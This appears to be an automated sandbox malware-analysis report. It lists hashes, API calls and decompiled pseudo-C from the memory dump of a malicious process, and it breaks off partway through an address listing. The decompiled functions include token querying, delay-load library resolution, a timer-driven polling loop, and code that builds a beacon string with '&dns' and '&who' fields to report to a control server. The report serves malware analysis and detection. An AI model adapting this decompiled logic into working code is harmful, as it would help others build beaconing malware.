Opcode Fuzzy Hash: 6bd8540e5d52b149f1a7f3e964fd44ffbe870b95156b068eec19d302af43f016
Instruction Fuzzy Hash: 4E313872A40206EFDB10DFA8CD80AAEF7FAEF54304F10446AE505D7210DF30EA5A8B58

Uniqueness

Uniqueness Score: -1.00%

Function 6DDE17B0, Relevance: 11.0, APIs: 7, Instructions: 527COMMON

Download Yara Rule

APIs

std::locale::locale.LIBCPMTD ref: 6DDE17EB

Part of subcall function 6DDE3B70: std::locale::_Init.LIBCPMT ref: 6DDE3B79

_setlocale.LIBCMT ref: 6DDE17FE

Part of subcall function 6DDEC33C: _mbstowcs_s.LIBCMT ref: 6DDEC362
Part of subcall function 6DDEC33C: __invoke_watson.LIBCMT ref: 6DDEC37D
Part of subcall function 6DDEC33C: __calloc_crt.LIBCMT ref: 6DDEC387

SetConsoleOutputCP.KERNEL32(000004E3), ref: 6DDE181E
GetModuleFileNameA.KERNELBASE(00000000,6DE1CB58,000008C6,?,?,00000006,00000000), ref: 6DDE1850
SetConsoleCP.KERNEL32(00000000), ref: 6DDE18D9
_malloc.LIBCMT ref: 6DDE18E4
GetCurrentDirectoryA.KERNEL32(000008C6,?,00000000), ref: 6DDE1A5B

Memory Dump Source

Source File: 00000003.00000002.500576744.000000006DDD0000.00000040.00020000.sdmp, Offset: 6DDD0000, based on PE: false

Similarity

API ID: Console$CurrentDirectoryFileInitModuleNameOutput__calloc_crt__invoke_watson_malloc_mbstowcs_s_setlocalestd::locale::_std::locale::locale
String ID:
API String ID: 1969868346-0
Opcode ID: 125c00d4df4e3d73187eb5706332ee383647dc78a3cc420fc369aacd6e4e0462
Instruction ID: a7c3f0db16dad4f682c034d0042f5f6ce545a95ee1b192f07e74e29f45f7acaa
Opcode Fuzzy Hash: 125c00d4df4e3d73187eb5706332ee383647dc78a3cc420fc369aacd6e4e0462
Instruction Fuzzy Hash: 404204B0F04209DFCB08DFA8D992B9DBBF6FB8A344F10821AE425A7355E730A545CB54

Uniqueness

Uniqueness Score: -1.00%

Function 02A75A27, Relevance: 10.6, APIs: 7, Instructions: 81
nativeCOMMON

Download Yara Rule

C-Code - Quality: 38%

			E02A75A27(char _a4, void* _a8) {
				void* _v8;
				void* _v12;
				char _v16;
				void* _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				void* _v44;
				void** _t33;
				void* _t40;
				void* _t43;
				void** _t44;
				intOrPtr* _t47;
				char _t48;

				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v20 = _a4;
				_t48 = 0;
				_v16 = 0;
				_a4 = 0;
				_v44 = 0x18;
				_v40 = 0;
				_v32 = 0;
				_v36 = 0;
				_v28 = 0;
				_v24 = 0;
				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
					_t33 =  &_v8;
					__imp__(_v12, 8, _t33);
					if(_t33 >= 0) {
						_t47 = __imp__;
						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
						_t44 = E02A7A71F(_a4);
						if(_t44 != 0) {
							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
							if(_t40 >= 0) {
								memcpy(_a8,  *_t44, 0x1c);
								_t48 = 1;
							}
							E02A7A734(_t44);
						}
						NtClose(_v8); // executed
					}
					NtClose(_v12);
				}
				return _t48;
			}

0x02a75a34
0x02a75a35
0x02a75a36
0x02a75a37
0x02a75a38
0x02a75a3c
0x02a75a43
0x02a75a52
0x02a75a55
0x02a75a58
0x02a75a5f
0x02a75a62
0x02a75a65
0x02a75a68
0x02a75a6b
0x02a75a76
0x02a75a78
0x02a75a81
0x02a75a89
0x02a75a8b
0x02a75a9d
0x02a75aa7
0x02a75aab
0x02a75aba
0x02a75abe
0x02a75ac7
0x02a75acf
0x02a75acf
0x02a75ad1
0x02a75ad1
0x02a75ad9
0x02a75adf
0x02a75ae3
0x02a75ae3
0x02a75aee

APIs

NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 02A75A6E
NtOpenProcessToken.NTDLL(00000000,00000008,?), ref: 02A75A81
NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 02A75A9D

Part of subcall function 02A7A71F: RtlAllocateHeap.NTDLL(00000000,00000000,02A75595), ref: 02A7A72B

NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 02A75ABA
memcpy.NTDLL(00000000,00000000,0000001C), ref: 02A75AC7
NtClose.NTDLL(?), ref: 02A75AD9
NtClose.NTDLL(00000000), ref: 02A75AE3

Memory Dump Source

Source File: 00000003.00000002.497510597.0000000002A71000.00000020.00000001.sdmp, Offset: 02A70000, based on PE: true

Associated: 00000003.00000002.497500527.0000000002A70000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.497530250.0000000002A7C000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.497539740.0000000002A7D000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.497549340.0000000002A7F000.00000002.00000001.sdmp Download File

Similarity

API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
String ID:
API String ID: 2575439697-0
Opcode ID: 15d44b5fe374c9aa51b3b9b48e6ab8c510a9f600e697d7a6370a7ab702a814ee
Instruction ID: 05e8534c3e8d03862059487955bfa8d1714971b622a69e3c38d2ba7ade7a00d2
Opcode Fuzzy Hash: 15d44b5fe374c9aa51b3b9b48e6ab8c510a9f600e697d7a6370a7ab702a814ee
Instruction Fuzzy Hash: 85210572940218BBDB01AFA5DD85ADEBFBEEB08750F104022FA01E6110DB719A599BE4

Uniqueness

Uniqueness Score: -1.00%

Function 02A74AB6, Relevance: 33.2, APIs: 22, Instructions: 244
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E02A74AB6(long __eax, void* __ecx, void* __edx, intOrPtr _a4, char** _a8, int* _a12, void* _a16) {
				void* _v8;
				signed int _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				void* _v28;
				void* __ebx;
				void* __edi;
				long _t59;
				intOrPtr _t60;
				intOrPtr _t61;
				intOrPtr _t62;
				intOrPtr _t63;
				intOrPtr _t64;
				void* _t67;
				intOrPtr _t68;
				int _t71;
				void* _t72;
				void* _t73;
				void* _t75;
				void* _t78;
				intOrPtr _t82;
				intOrPtr _t86;
				intOrPtr* _t88;
				void* _t94;
				intOrPtr _t100;
				signed int _t104;
				char** _t106;
				int _t109;
				signed int _t111;
				intOrPtr* _t112;
				intOrPtr* _t114;
				intOrPtr* _t116;
				intOrPtr* _t118;
				intOrPtr _t121;
				intOrPtr _t126;
				int _t130;
				CHAR* _t132;
				intOrPtr _t133;
				void* _t134;
				void* _t143;
				int _t144;
				void* _t145;
				intOrPtr _t146;
				void* _t148;
				long _t152;
				intOrPtr* _t153;
				intOrPtr* _t154;
				intOrPtr* _t157;
				void* _t158;
				void* _t160;

				_t143 = __edx;
				_t134 = __ecx;
				_t59 = __eax;
				_v12 = 8;
				if(__eax == 0) {
					_t59 = GetTickCount();
				}
				_t60 =  *0x2a7d018; // 0xfa73a582
				asm("bswap eax");
				_t61 =  *0x2a7d014; // 0x3a87c8cd
				_t132 = _a16;
				asm("bswap eax");
				_t62 =  *0x2a7d010; // 0xd8d2f808
				asm("bswap eax");
				_t63 =  *0x2a7d00c; // 0x8f8f86c2
				asm("bswap eax");
				_t64 =  *0x2a7d2a8; // 0x229a5a8
				_t3 = _t64 + 0x2a7e633; // 0x74666f73
				_t144 = wsprintfA(_t132, _t3, 3, 0x3d15e, _t63, _t62, _t61, _t60,  *0x2a7d02c,  *0x2a7d004, _t59);
				_t67 = E02A756CD();
				_t68 =  *0x2a7d2a8; // 0x229a5a8
				_t4 = _t68 + 0x2a7e673; // 0x74707526
				_t71 = wsprintfA(_t144 + _t132, _t4, _t67);
				_t160 = _t158 + 0x38;
				_t145 = _t144 + _t71; // executed
				_t72 = E02A758DB(_t134); // executed
				_t133 = __imp__;
				_v8 = _t72;
				if(_t72 != 0) {
					_t126 =  *0x2a7d2a8; // 0x229a5a8
					_t7 = _t126 + 0x2a7e8d4; // 0x736e6426
					_t130 = wsprintfA(_a16 + _t145, _t7, _t72);
					_t160 = _t160 + 0xc;
					_t145 = _t145 + _t130;
					HeapFree( *0x2a7d238, 0, _v8);
				}
				_t73 = E02A7A199();
				_v8 = _t73;
				if(_t73 != 0) {
					_t121 =  *0x2a7d2a8; // 0x229a5a8
					_t11 = _t121 + 0x2a7e8dc; // 0x6f687726
					wsprintfA(_t145 + _a16, _t11, _t73);
					_t160 = _t160 + 0xc;
					HeapFree( *0x2a7d238, 0, _v8);
				}
				_t146 =  *0x2a7d32c; // 0x4d195b0
				_t75 = E02A74622(0x2a7d00a, _t146 + 4);
				_t152 = 0;
				_v20 = _t75;
				if(_t75 == 0) {
					L26:
					RtlFreeHeap( *0x2a7d238, _t152, _a16); // executed
					return _v12;
				} else {
					_t78 = RtlAllocateHeap( *0x2a7d238, 0, 0x800);
					_v8 = _t78;
					if(_t78 == 0) {
						L25:
						HeapFree( *0x2a7d238, _t152, _v20);
						goto L26;
					}
					E02A7518F(GetTickCount());
					_t82 =  *0x2a7d32c; // 0x4d195b0
					__imp__(_t82 + 0x40);
					asm("lock xadd [eax], ecx");
					_t86 =  *0x2a7d32c; // 0x4d195b0
					__imp__(_t86 + 0x40);
					_t88 =  *0x2a7d32c; // 0x4d195b0
					_t148 = E02A71BB6(1, _t143, _a16,  *_t88);
					_v28 = _t148;
					asm("lock xadd [eax], ecx");
					if(_t148 == 0) {
						L24:
						HeapFree( *0x2a7d238, _t152, _v8);
						goto L25;
					}
					StrTrimA(_t148, 0x2a7c28c);
					_push(_t148);
					_t94 = E02A7361A();
					_v16 = _t94;
					if(_t94 == 0) {
						L23:
						HeapFree( *0x2a7d238, _t152, _t148);
						goto L24;
					}
					_t153 = __imp__;
					 *_t153(_t148, _a4);
					 *_t153(_v8, _v20);
					_t154 = __imp__;
					 *_t154(_v8, _v16);
					_t100 = E02A79070( *_t154(_v8, _t148), _v8);
					_a4 = _t100;
					if(_t100 == 0) {
						_v12 = 8;
						L21:
						E02A76761();
						L22:
						HeapFree( *0x2a7d238, 0, _v16);
						_t152 = 0;
						goto L23;
					}
					_t104 = E02A769B4(_t133, 0xffffffffffffffff, _t148,  &_v24); // executed
					_v12 = _t104;
					if(_t104 == 0) {
						_t157 = _v24;
						_t111 = E02A7391F(_t157, _a4, _a8, _a12); // executed
						_v12 = _t111;
						_t112 =  *((intOrPtr*)(_t157 + 8));
						 *((intOrPtr*)( *_t112 + 0x80))(_t112);
						_t114 =  *((intOrPtr*)(_t157 + 8));
						 *((intOrPtr*)( *_t114 + 8))(_t114);
						_t116 =  *((intOrPtr*)(_t157 + 4));
						 *((intOrPtr*)( *_t116 + 8))(_t116);
						_t118 =  *_t157;
						 *((intOrPtr*)( *_t118 + 8))(_t118);
						E02A7A734(_t157);
					}
					if(_v12 != 0x10d2) {
						L16:
						if(_v12 == 0) {
							_t106 = _a8;
							if(_t106 != 0) {
								_t149 =  *_t106;
								_t155 =  *_a12;
								wcstombs( *_t106,  *_t106,  *_a12);
								_t109 = E02A75800(_t149, _t149, _t155 >> 1);
								_t148 = _v28;
								 *_a12 = _t109;
							}
						}
						goto L19;
					} else {
						if(_a8 != 0) {
							L19:
							E02A7A734(_a4);
							if(_v12 == 0 || _v12 == 0x10d2) {
								goto L22;
							} else {
								goto L21;
							}
						}
						_v12 = _v12 & 0x00000000;
						goto L16;
					}
				}
			}

0x02a74ab6
0x02a74ab6
0x02a74ab6
0x02a74abf
0x02a74ac8
0x02a74aca
0x02a74aca
0x02a74ad7
0x02a74ae2
0x02a74ae5
0x02a74aea
0x02a74af3
0x02a74af6
0x02a74afb
0x02a74afe
0x02a74b03
0x02a74b06
0x02a74b12
0x02a74b1f
0x02a74b21
0x02a74b27
0x02a74b2c
0x02a74b37
0x02a74b39
0x02a74b3c
0x02a74b3e
0x02a74b43
0x02a74b49
0x02a74b4e
0x02a74b51
0x02a74b56
0x02a74b63
0x02a74b65
0x02a74b6b
0x02a74b75
0x02a74b75
0x02a74b77
0x02a74b7c
0x02a74b81
0x02a74b84
0x02a74b89
0x02a74b96
0x02a74b98
0x02a74ba6
0x02a74ba6
0x02a74ba8
0x02a74bb6
0x02a74bbb
0x02a74bbd
0x02a74bc2
0x02a74d83
0x02a74d8d
0x02a74d96
0x02a74bc8
0x02a74bd4
0x02a74bda
0x02a74bdf
0x02a74d77
0x02a74d81
0x00000000
0x02a74d81
0x02a74beb
0x02a74bf0
0x02a74bf9
0x02a74c0a
0x02a74c0e
0x02a74c17
0x02a74c1d
0x02a74c2c
0x02a74c33
0x02a74c3c
0x02a74c42
0x02a74d6b
0x02a74d75
0x00000000
0x02a74d75
0x02a74c4e
0x02a74c54
0x02a74c55
0x02a74c5a
0x02a74c5f
0x02a74d61
0x02a74d69
0x00000000
0x02a74d69
0x02a74c68
0x02a74c6f
0x02a74c77
0x02a74c7c
0x02a74c85
0x02a74c90
0x02a74c95
0x02a74c9a
0x02a74d99
0x02a74d4d
0x02a74d4d
0x02a74d52
0x02a74d5d
0x02a74d5f
0x00000000
0x02a74d5f
0x02a74ca4
0x02a74ca9
0x02a74cae
0x02a74cb3
0x02a74cbe
0x02a74cc3
0x02a74cc6
0x02a74ccc
0x02a74cd2
0x02a74cd8
0x02a74cdb
0x02a74ce1
0x02a74ce4
0x02a74ce9
0x02a74ced
0x02a74ced
0x02a74cf9
0x02a74d05
0x02a74d09
0x02a74d0b
0x02a74d10
0x02a74d12
0x02a74d17
0x02a74d1c
0x02a74d29
0x02a74d31
0x02a74d34
0x02a74d34
0x02a74d10
0x00000000
0x02a74cfb
0x02a74cff
0x02a74d36
0x02a74d39
0x02a74d42
0x00000000
0x00000000
0x00000000
0x00000000
0x02a74d42
0x02a74d01
0x00000000
0x02a74d01
0x02a74cf9

APIs

GetTickCount.KERNEL32 ref: 02A74ACA
wsprintfA.USER32 ref: 02A74B1A
wsprintfA.USER32 ref: 02A74B37
wsprintfA.USER32 ref: 02A74B63
HeapFree.KERNEL32(00000000,?), ref: 02A74B75
wsprintfA.USER32 ref: 02A74B96
HeapFree.KERNEL32(00000000,?), ref: 02A74BA6
RtlAllocateHeap.NTDLL(00000000,00000800), ref: 02A74BD4
GetTickCount.KERNEL32 ref: 02A74BE5
RtlEnterCriticalSection.NTDLL(04D19570), ref: 02A74BF9
RtlLeaveCriticalSection.NTDLL(04D19570), ref: 02A74C17

Part of subcall function 02A71BB6: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,74ECC740,?,?,02A720C2,?,04D195B0), ref: 02A71BE1
Part of subcall function 02A71BB6: lstrlen.KERNEL32(?,?,?,02A720C2,?,04D195B0), ref: 02A71BE9
Part of subcall function 02A71BB6: strcpy.NTDLL ref: 02A71C00
Part of subcall function 02A71BB6: lstrcat.KERNEL32(00000000,?), ref: 02A71C0B
Part of subcall function 02A71BB6: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,02A720C2,?,04D195B0), ref: 02A71C28

StrTrimA.SHLWAPI(00000000,02A7C28C,?,04D195B0), ref: 02A74C4E

Part of subcall function 02A7361A: lstrlen.KERNEL32(04D19A48,00000000,00000000,74ECC740,02A720ED,00000000), ref: 02A7362A
Part of subcall function 02A7361A: lstrlen.KERNEL32(?), ref: 02A73632
Part of subcall function 02A7361A: lstrcpy.KERNEL32(00000000,04D19A48), ref: 02A73646
Part of subcall function 02A7361A: lstrcat.KERNEL32(00000000,?), ref: 02A73651

lstrcpy.KERNEL32(00000000,?), ref: 02A74C6F
lstrcpy.KERNEL32(?,?), ref: 02A74C77
lstrcat.KERNEL32(?,?), ref: 02A74C85
lstrcat.KERNEL32(?,00000000), ref: 02A74C8B

Part of subcall function 02A79070: lstrlen.KERNEL32(?,00000000,04D19A70,00000000,02A78808,04D19C4E,?,?,?,?,?,63699BC3,00000005,02A7D00C), ref: 02A79077
Part of subcall function 02A79070: mbstowcs.NTDLL ref: 02A790A0
Part of subcall function 02A79070: memset.NTDLL ref: 02A790B2

wcstombs.NTDLL ref: 02A74D1C

Part of subcall function 02A7391F: SysAllocString.OLEAUT32(?), ref: 02A7395A
Part of subcall function 02A7391F: IUnknown_QueryInterface_Proxy.RPCRT4(?,332C4425,?), ref: 02A739DD

Part of subcall function 02A7A734: HeapFree.KERNEL32(00000000,00000000,02A75637,00000000,?,?,00000000), ref: 02A7A740

HeapFree.KERNEL32(00000000,?,?), ref: 02A74D5D
HeapFree.KERNEL32(00000000,00000000,00000000), ref: 02A74D69
HeapFree.KERNEL32(00000000,?,?,04D195B0), ref: 02A74D75
HeapFree.KERNEL32(00000000,?), ref: 02A74D81
RtlFreeHeap.NTDLL(00000000,?), ref: 02A74D8D

Memory Dump Source

Source File: 00000003.00000002.497510597.0000000002A71000.00000020.00000001.sdmp, Offset: 02A70000, based on PE: true

Associated: 00000003.00000002.497500527.0000000002A70000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.497530250.0000000002A7C000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.497539740.0000000002A7D000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.497549340.0000000002A7F000.00000002.00000001.sdmp Download File

Similarity

API ID: Heap$Free$lstrlen$lstrcatwsprintf$lstrcpy$CountCriticalSectionTickTrim$AllocAllocateEnterInterface_LeaveProxyQueryStringUnknown_mbstowcsmemsetstrcpywcstombs
String ID:
API String ID: 603507560-0
Opcode ID: ee9cefc17ab2a875f4f04e160075240db25853bc4235e52bef19962a1bf3b894
Instruction ID: f426947d014592e78912eeec674f32c9193a26b3b2ef0e2a373896a114f5102c
Opcode Fuzzy Hash: ee9cefc17ab2a875f4f04e160075240db25853bc4235e52bef19962a1bf3b894
Instruction Fuzzy Hash: 72914A71940608AFCB11DFA4DD84A9EBBBAEF48310F144455F905D7220DF31D966DFA8

Uniqueness

Uniqueness Score: -1.00%

Function 02A7AC55, Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 209
libraryCOMMON

Download Yara Rule

C-Code - Quality: 51%

			E02A7AC55(long _a4, long _a8) {
				signed int _v8;
				intOrPtr _v16;
				LONG* _v28;
				long _v40;
				long _v44;
				long _v48;
				CHAR* _v52;
				long _v56;
				CHAR* _v60;
				long _v64;
				signed int* _v68;
				char _v72;
				signed int _t76;
				signed int _t80;
				signed int _t81;
				intOrPtr* _t82;
				intOrPtr* _t83;
				intOrPtr* _t85;
				intOrPtr* _t90;
				intOrPtr* _t95;
				intOrPtr* _t98;
				struct HINSTANCE__* _t99;
				void* _t102;
				intOrPtr* _t104;
				void* _t115;
				long _t116;
				void _t125;
				void* _t131;
				signed short _t133;
				struct HINSTANCE__* _t138;
				signed int* _t139;

				_t139 = _a4;
				_v28 = _t139[2] + 0x2a70000;
				_t115 = _t139[3] + 0x2a70000;
				_t131 = _t139[4] + 0x2a70000;
				_v8 = _t139[7];
				_v60 = _t139[1] + 0x2a70000;
				_v16 = _t139[5] + 0x2a70000;
				_v64 = _a8;
				_v72 = 0x24;
				_v68 = _t139;
				_v56 = 0;
				asm("stosd");
				_v48 = 0;
				_v44 = 0;
				_v40 = 0;
				if(( *_t139 & 0x00000001) == 0) {
					_a8 =  &_v72;
					RaiseException(0xc06d0057, 0, 1,  &_a8);
					return 0;
				}
				_t138 =  *_v28;
				_t76 = _a8 - _t115 >> 2 << 2;
				_t133 =  *(_t131 + _t76);
				_a4 = _t76;
				_t80 =  !(_t133 >> 0x1f) & 0x00000001;
				_v56 = _t80;
				_t81 = _t133 + 0x2a70002;
				if(_t80 == 0) {
					_t81 = _t133 & 0x0000ffff;
				}
				_v52 = _t81;
				_t82 =  *0x2a7d1a0; // 0x0
				_t116 = 0;
				if(_t82 == 0) {
					L6:
					if(_t138 != 0) {
						L18:
						_t83 =  *0x2a7d1a0; // 0x0
						_v48 = _t138;
						if(_t83 != 0) {
							_t116 =  *_t83(2,  &_v72);
						}
						if(_t116 != 0) {
							L32:
							 *_a8 = _t116;
							L33:
							_t85 =  *0x2a7d1a0; // 0x0
							if(_t85 != 0) {
								_v40 = _v40 & 0x00000000;
								_v48 = _t138;
								_v44 = _t116;
								 *_t85(5,  &_v72);
							}
							return _t116;
						} else {
							if(_t139[5] == _t116 || _t139[7] == _t116) {
								L27:
								_t116 = GetProcAddress(_t138, _v52);
								if(_t116 == 0) {
									_v40 = GetLastError();
									_t90 =  *0x2a7d19c; // 0x0
									if(_t90 != 0) {
										_t116 =  *_t90(4,  &_v72);
									}
									if(_t116 == 0) {
										_a4 =  &_v72;
										RaiseException(0xc06d007f, _t116, 1,  &_a4);
										_t116 = _v44;
									}
								}
								goto L32;
							} else {
								_t95 =  *((intOrPtr*)(_t138 + 0x3c)) + _t138;
								if( *_t95 == 0x4550 &&  *((intOrPtr*)(_t95 + 8)) == _v8 && _t138 ==  *((intOrPtr*)(_t95 + 0x34))) {
									_t116 =  *(_a4 + _v16);
									if(_t116 != 0) {
										goto L32;
									}
								}
								goto L27;
							}
						}
					}
					_t98 =  *0x2a7d1a0; // 0x0
					if(_t98 == 0) {
						L9:
						_t99 = LoadLibraryA(_v60); // executed
						_t138 = _t99;
						if(_t138 != 0) {
							L13:
							if(InterlockedExchange(_v28, _t138) == _t138) {
								FreeLibrary(_t138);
							} else {
								if(_t139[6] != 0) {
									_t102 = LocalAlloc(0x40, 8);
									if(_t102 != 0) {
										 *(_t102 + 4) = _t139;
										_t125 =  *0x2a7d198; // 0x0
										 *_t102 = _t125;
										 *0x2a7d198 = _t102;
									}
								}
							}
							goto L18;
						}
						_v40 = GetLastError();
						_t104 =  *0x2a7d19c; // 0x0
						if(_t104 == 0) {
							L12:
							_a8 =  &_v72;
							RaiseException(0xc06d007e, 0, 1,  &_a8);
							return _v44;
						}
						_t138 =  *_t104(3,  &_v72);
						if(_t138 != 0) {
							goto L13;
						}
						goto L12;
					}
					_t138 =  *_t98(1,  &_v72);
					if(_t138 != 0) {
						goto L13;
					}
					goto L9;
				}
				_t116 =  *_t82(0,  &_v72);
				if(_t116 != 0) {
					goto L33;
				}
				goto L6;
			}

0x02a7ac64
0x02a7ac7a
0x02a7ac80
0x02a7ac82
0x02a7ac87
0x02a7ac8d
0x02a7ac92
0x02a7ac95
0x02a7aca3
0x02a7acaa
0x02a7acad
0x02a7acb0
0x02a7acb1
0x02a7acb4
0x02a7acb7
0x02a7acba
0x02a7acbf
0x02a7acce
0x00000000
0x02a7acd4
0x02a7acde
0x02a7ace8
0x02a7aced
0x02a7acef
0x02a7acf9
0x02a7acfc
0x02a7acff
0x02a7ad05
0x02a7ad07
0x02a7ad07
0x02a7ad0a
0x02a7ad0d
0x02a7ad12
0x02a7ad16
0x02a7ad29
0x02a7ad2b
0x02a7add3
0x02a7add3
0x02a7adda
0x02a7addd
0x02a7ade7
0x02a7ade7
0x02a7adeb
0x02a7ae69
0x02a7ae6c
0x02a7ae6e
0x02a7ae6e
0x02a7ae75
0x02a7ae77
0x02a7ae81
0x02a7ae84
0x02a7ae87
0x02a7ae87
0x00000000
0x02a7aded
0x02a7adf0
0x02a7ae1e
0x02a7ae28
0x02a7ae2c
0x02a7ae34
0x02a7ae37
0x02a7ae3e
0x02a7ae48
0x02a7ae48
0x02a7ae4c
0x02a7ae51
0x02a7ae60
0x02a7ae66
0x02a7ae66
0x02a7ae4c
0x00000000
0x02a7adf7
0x02a7adfa
0x02a7ae02
0x02a7ae17
0x02a7ae1c
0x00000000
0x00000000
0x02a7ae1c
0x00000000
0x02a7ae02
0x02a7adf0
0x02a7adeb
0x02a7ad31
0x02a7ad38
0x02a7ad48
0x02a7ad4b
0x02a7ad51
0x02a7ad55
0x02a7ad98
0x02a7ada4
0x02a7adcd
0x02a7ada6
0x02a7adaa
0x02a7adb0
0x02a7adb8
0x02a7adba
0x02a7adbd
0x02a7adc3
0x02a7adc5
0x02a7adc5
0x02a7adb8
0x02a7adaa
0x00000000
0x02a7ada4
0x02a7ad5d
0x02a7ad60
0x02a7ad67
0x02a7ad77
0x02a7ad7a
0x02a7ad8a
0x00000000
0x02a7ad90
0x02a7ad71
0x02a7ad75
0x00000000
0x00000000
0x00000000
0x02a7ad75
0x02a7ad42
0x02a7ad46
0x00000000
0x00000000
0x00000000
0x02a7ad46
0x02a7ad1f
0x02a7ad23
0x00000000
0x00000000
0x00000000

APIs

RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 02A7ACCE
LoadLibraryA.KERNELBASE(?), ref: 02A7AD4B
GetLastError.KERNEL32 ref: 02A7AD57
RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 02A7AD8A

Strings

$, xrefs: 02A7ACA3

Memory Dump Source

Source File: 00000003.00000002.497510597.0000000002A71000.00000020.00000001.sdmp, Offset: 02A70000, based on PE: true

Associated: 00000003.00000002.497500527.0000000002A70000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.497530250.0000000002A7C000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.497539740.0000000002A7D000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.497549340.0000000002A7F000.00000002.00000001.sdmp Download File

Similarity

API ID: ExceptionRaise$ErrorLastLibraryLoad
String ID: $
API String ID: 948315288-3993045852
Opcode ID: 45a684f5f2ffeeb3541b778ee4ed7a76a5b44632a2a579d3d28de127faa740e5
Instruction ID: f1221890170ba3c9816f11f72301e55659d194f93e46411d0f68c4a9cdec79d7
Opcode Fuzzy Hash: 45a684f5f2ffeeb3541b778ee4ed7a76a5b44632a2a579d3d28de127faa740e5
Instruction Fuzzy Hash: FE811871A40705AFDB10CFA8DC80BAEB7F5AF48315F14842AE945E7241EF70E946CB58

Uniqueness

Uniqueness Score: -1.00%

Function 02A751B0, Relevance: 16.6, APIs: 11, Instructions: 150
timememoryCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E02A751B0(intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				struct %anon52 _v8;
				long _v12;
				char _v16;
				char _v20;
				signed int _v24;
				intOrPtr _v32;
				union _LARGE_INTEGER _v36;
				intOrPtr _v40;
				void* _v44;
				void _v88;
				char _v92;
				struct %anon52 _t46;
				intOrPtr _t51;
				long _t53;
				void* _t54;
				struct %anon52 _t60;
				long _t64;
				signed int _t65;
				void* _t68;
				void* _t70;
				signed int _t71;
				intOrPtr _t73;
				intOrPtr _t76;
				void** _t78;
				void* _t80;

				_t73 = __edx;
				_v92 = 0;
				memset( &_v88, 0, 0x2c);
				_t46 = CreateWaitableTimerA(0, 1, 0);
				_v44 = _t46;
				if(_t46 == 0) {
					_v8.LowPart = GetLastError();
				} else {
					_push(0xffffffff);
					_push(0xff676980);
					_push(0);
					_push( *0x2a7d240);
					_v20 = 0;
					_v16 = 0;
					L02A7AF2E();
					_v36.LowPart = _t46;
					_v32 = _t73;
					SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0);
					_t51 =  *0x2a7d26c; // 0x2cc
					_v40 = _t51;
					_t53 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
					_v8.LowPart = _t53;
					if(_t53 == 0) {
						if(_a8 != 0) {
							L4:
							 *0x2a7d24c = 5;
						} else {
							_t68 = E02A78D14(_t73); // executed
							if(_t68 != 0) {
								goto L4;
							}
						}
						_v12 = 0;
						L6:
						L6:
						if(_v12 == 1 && ( *0x2a7d260 & 0x00000001) == 0) {
							_v12 = 2;
						}
						_t71 = _v12;
						_t58 = _t71 << 4;
						_t76 = _t80 + (_t71 << 4) - 0x54;
						_t72 = _t71 + 1;
						_v24 = _t71 + 1;
						_t60 = E02A7A376(_t72, _t76, _t72, _t80 + _t58 - 0x58, _t76,  &_v20,  &_v16); // executed
						_v8.LowPart = _t60;
						if(_t60 != 0) {
							goto L17;
						}
						_t65 = _v24;
						_v12 = _t65;
						_t90 = _t65 - 3;
						if(_t65 != 3) {
							goto L6;
						} else {
							_v8.LowPart = E02A736B1(_t72, _t90,  &_v92, _a4, _a8);
						}
						goto L12;
						L17:
						__eflags = _t60 - 0x10d2;
						if(_t60 != 0x10d2) {
							_push(0xffffffff);
							_push(0xff676980);
							_push(0);
							_push( *0x2a7d244);
							goto L21;
						} else {
							__eflags =  *0x2a7d248; // 0x0
							if(__eflags == 0) {
								goto L12;
							} else {
								_t60 = E02A76761();
								_push(0xffffffff);
								_push(0xdc3cba00);
								_push(0);
								_push( *0x2a7d248);
								L21:
								L02A7AF2E();
								_v36.LowPart = _t60;
								_v32 = _t76;
								SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0); // executed
								_t64 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
								_v8.LowPart = _t64;
								__eflags = _t64;
								if(_t64 == 0) {
									goto L6;
								} else {
									goto L12;
								}
							}
						}
						L25:
					}
					L12:
					_t78 =  &_v92;
					_t70 = 3;
					do {
						_t54 =  *_t78;
						if(_t54 != 0) {
							HeapFree( *0x2a7d238, 0, _t54);
						}
						_t78 =  &(_t78[4]);
						_t70 = _t70 - 1;
					} while (_t70 != 0);
					CloseHandle(_v44);
				}
				return _v8;
				goto L25;
			}

0x02a751b0
0x02a751c2
0x02a751c5
0x02a751d1
0x02a751d7
0x02a751dc
0x02a75343
0x02a751e2
0x02a751e2
0x02a751e4
0x02a751e9
0x02a751ea
0x02a751f0
0x02a751f3
0x02a751f6
0x02a75204
0x02a7520f
0x02a75212
0x02a75214
0x02a75221
0x02a7522b
0x02a7522d
0x02a75232
0x02a75237
0x02a75242
0x02a75242
0x02a75239
0x02a75239
0x02a75240
0x00000000
0x00000000
0x02a75240
0x02a7524c
0x00000000
0x02a7524f
0x02a75253
0x02a7525e
0x02a7525e
0x02a75265
0x02a7526e
0x02a75275
0x02a7527e
0x02a75281
0x02a75284
